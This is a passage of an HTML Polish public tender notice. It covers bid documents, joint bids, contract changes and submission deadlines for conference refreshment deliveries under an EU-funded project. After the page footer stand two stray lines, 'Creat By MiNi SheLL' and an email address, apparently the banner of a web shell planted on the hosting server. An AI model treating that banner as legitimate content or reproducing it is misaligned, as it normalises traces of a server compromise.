ich wskazania w ofercie oraz do złożenia wraz z ofertą<br/>dokumentów potwierdzających, że oferowane rozwiązania równoważne spełniają wymagania<br/>Zamawiającego opisane w przedmiocie zamówienia. Jeżeli Wykonawca nie złoży ww.<br/>dokumentów lub złożone dokumenty będą niekompletne (nie potwierdzając w ten sposób<br/>równoważności oferty w zakresie opisanym w opisie przedmiotu zamówienia, Zamawiający nie<br/>będzie wzywał do ich złożenia/uzupełnienia). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wraz z ofertą należy złożyć:1.1. Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy, o<br/>niepodleganiu wykluczeniu z postępowania, w zakresie wskazanym w rozdziale V SWZ –<br/>zgodnie z załącznikiem nr 2 do SWZ. Oświadczenie stanowi dowód potwierdzający brak<br/>podstaw wykluczenia na dzień składania ofert. Oświadczenie składa się, pod rygorem<br/>nieważności, w formie elektronicznej (w postaci elektronicznej opatrzonej kwalifikowanym<br/>podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub<br/>podpisem osobistym. 1.2. Formularz asortymentowo-cenowy – załącznik nr 1A do Formularza<br/>oferty.1.3. Pełnomocnictwo ustanowione do reprezentowania Wykonawcy/ów ubiegającego/cych<br/>się o udzielenie zamówienia publicznego.Pełnomocnictwo przekazuje się w postaci<br/>elektronicznej i opatruje kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym. W przypadku, gdy pełnomocnictwo zostało wystawione w postaci<br/>papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego<br/>dokumentu, opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub<br/>podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w<br/>postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z pełnomocnictwem w<br/>postaci papierowej, może dokonać mocodawca (osoba/osoby wystawiające pełnomocnictwo)<br/>lub notariusz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.2. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego – nie dotyczy spółki cywilnej, o ile<br/>upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do<br/>oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.3. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z ofertą stosowne<br/>pełnomocnictwo – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do<br/>występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy<br/>wspólnicy podpiszą ofertę.Uwaga :Pełnomocnictwo, o którym mowa powyżej może wynikać albo<br/>z dokumentu pod taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia.4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała<br/>wszystkich Wykonawców występujących wspólnie (przez każdego z Wykonawców lub<br/>upoważnionego pełnomocnika).5. W przypadku wspólnego ubiegania się o udzielenie<br/>zamówienie przez Wykonawców oświadczenie, o którym mowa w art. 125 ustawy (Rozdział IX<br/>ust. 3.1. SWZ) - składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenie to potwierdza spełnianie warunków udziału w postępowaniu w zakresie, w którym<br/>Wykonawca wspólnie ubiegający się o udzielenie zamówienia wykazuje brak podstaw<br/>wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie<br/>może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ podstawy<br/>wykluczenia. Powyższe oznacza, iż:Oświadczenie w zakresie braku podstaw wykluczenia musi<br/>złożyć każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.6. Wszelka<br/>korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną<br/>wprowadzone do treści tej umowy, zawiera załącznik nr 3 do SWZ (ze względu na ograniczoną<br/>ilość znaków w ogłoszeniu).1.1. Zamawiający przewiduje możliwość zmian postanowień<br/>zawartej umowy (tzw. zmiany kontraktowe w oparciu o art. 455 ust. 1 pkt 1 ustawy) w stosunku<br/>do treści oferty, na podstawie której dokonano wyboru Wykonawcy, zgodnie z warunkami<br/>zawartymi w załączniku nr 3 do SWZ.1.2. Zmiana umowy może także nastąpić w przypadkach,<br/>o których mowa w art. 455 ust. 1 pkt 2-4 oraz ust. 2 ustawy.2. Przed zawarciem umowy należy<br/>dopełnić formalności, które zostały wskazane w Rozdziale XXIII SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty srodowiskowe</p> <p class="mb-0">w zakresie żądania określonej etykiety lub wskazania mającego zastosowanie wymagania określonej etykiety, zgodnie z art. 104 ustawy: - etykiety społecznej</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem Platformy przetargowej https://mops-zawiercie.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-02 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Ofertę należy sporządzić na formularzu oferty lub według takiego samego schematu,<br/>stanowiącego załącznik nr 1 do SWZ. Ofertę należy złożyć pod rygorem nieważności w formie<br/>elektronicznej (w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym)<br/>lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.2. Oferta<br/>wraz z załącznikami musi być złożona za pośrednictwem Platformy przetargowej. Zamawiający<br/>zaleca, aby oferta została utworzona w formacie .pdf oraz podpisana wewnętrznym podpisem<br/>elektronicznym – zgodnie z rozdz. VIII ust. 2 SWZ. W przypadku zastosowania podpisu<br/>zewnętrznego należy pamiętać o obowiązku dołączenia do pliku stanowiącego ofertę także pliku<br/>podpisującego, który generuje się automatycznie podczas złożenia podpisu. 3. Z uwagi na<br/>ograniczoną ilość znaków w ogłoszeniu o zamówieniu, pozostałe informacje zostały określone w<br/>SWZ.4. Zamawiający wykluczy z postępowania Wykonawcę w przypadkach, o których mowa w<br/>art. 108 ust. 1 pkt 1-6 ustawy (obligatoryjne przesłanki wykluczenia) .5. Ze względu na<br/>ograniczoną ilość znaków w sekcji II pkt 2.3) Nazwa zamówienia albo umowy ramowej - Zamawiający podaje pełna nazwę zamówienia: Sukcesywna dostawa suszu konferencyjnego w<br/>ramach realizowanego projektu 9.1.1. „Wzmacnianie potencjału społeczno – zawodowego” na<br/>lata 2020-2022 II Etap współfinansowanego ze środków Europejskiego Funduszu<br/>Społecznego.6. Dotyczy Sekcji V 5.5) Zamawiający wymaga złożenia oświadczenia, o którym<br/>mowa w art 125 ust 1 ustawy Pzp tylko w zakresie potwierdzającym brak podstaw wykluczenia z<br/>postępowania.<br/>7. Wymagany termin realizacji zamówienia od dnia podpisania umowy do 29.10.2022r. Dostawy będą realizowane sukcesywnie w ilościach, terminie i według wskazań określonych przez Zamawiającego stosownie do zaistniałych potrzeb począwszy od dnia zawarcia umowy. Zamówienie każdej dostawy będzie się odbywało telefonicznie lub drogą elektroniczną z jednodniowym wyprzedzeniem w godz. 7.00 – 15.00, średnio 1 raz na dwa miesiące przez cały okres trwania umowy.</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-25 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com